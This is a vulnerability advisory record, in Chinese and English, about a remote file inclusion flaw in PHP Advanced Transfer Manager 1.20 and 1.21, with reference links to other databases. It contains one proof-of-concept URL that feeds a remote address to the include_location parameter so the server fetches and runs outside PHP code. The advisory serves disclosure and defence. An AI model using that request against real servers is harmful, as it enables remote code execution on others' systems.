https://www.exploit-db.com/exploits/25686
https://www.securityfocus.com/bid/89942
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1141

phpATM1.21和可能的更早版本中的common.php中存在PHP远程文件包含漏洞，远程攻击者可以通过传给index.php的include_location参数中的URL，执行任意PHP代码。

source: http://www.securityfocus.com/bid/13691/info

PHP Advanced Transfer Manager is prone to an arbitrary file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/index.php?include_location=http://www.example.com/

Bugada Andrea Php Advanced Transfer Manager 1.21

Bugada Andrea Php Advanced Transfer Manager 1.20

来源:OSVDB
名称:16692
链接:http://www.osvdb.org/16692
来源:SECTRACK
名称:1014008
链接:http://securitytracker.com/id?1014008
来源:SECUNIA
名称:15420
链接:http://secunia.com/advisories/15420
来源:BUGTRAQ
名称:20050519phpATMarbitraryPHPcodeinclusion
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111653168810937&w;=2